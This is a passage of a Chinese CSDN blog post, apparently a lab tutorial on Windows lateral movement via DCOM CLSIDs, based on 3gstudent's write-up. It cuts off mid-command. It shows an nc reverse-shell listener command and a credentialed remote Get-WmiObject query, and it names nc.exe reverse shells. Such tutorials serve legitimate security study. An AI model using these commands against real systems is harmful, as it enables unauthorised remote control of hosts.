横向远程命令执行——DCOM

本文介绍了DCOM(分布式组件对象模型)的概念和利用方式,特别是在Windows系统中的远程命令执行。通过不同CLSID,如9BA05972-F6A8-11CF-A442-00A0C90A8F39和C08AFD90-F2A1-11D1-8455-00A0C91F3880,可以实现对远程系统的命令执行,包括启动nc.exe反弹shell。测试环境包括Win7、Server2008和Server2012。
摘要由CSDN通过智能技术生成

  DCOM(分布式组件对象模型,分布式组件对象模式)是一系列微软的概念和程序接口,利用这个接口,客户端程序对象能够请求来自网络中另一台计算机上的服务器程序对象。DCOM基于组件对象模型(COM),COM提供了一套允许同一台计算机上的客户端和服务器之间进行通信的接口(运行在Windows95或者其后的版本上)。
  此篇文章学习自3gstudent 域渗透——利用DCOM在远程系统执行程序,可以看原文,原文链接: https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F/

1、 测试环境

  Win7:192.168.11.137
  Server2008:192.168.11.200
  Server2012:192.168.11.102
  若目标机开启共享且关闭防火墙,当我们拿到一个管理员账户时,在演示环境中,为了方便演示,在Server2008及Server2012配置了nc,通过nc反弹给攻击机一个交互式的shell。使用 nc -lvp [port] 在攻击机监听4444端口:
在这里插入图片描述

2、 DCOM利用

2.1 DCOM使用

  Get-WmiObject查询指定CLSID注册表信息, shexink\administrator 为登录用户名。

Get-WmiObject Win32_COMSetting -computername 192.168.11.200 -credential shexink\administrator | Select-String "9BA05972-F6A8-11CF-A442-00A0C90A8F39"
Get-WmiObject Win32_COMSetting -
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值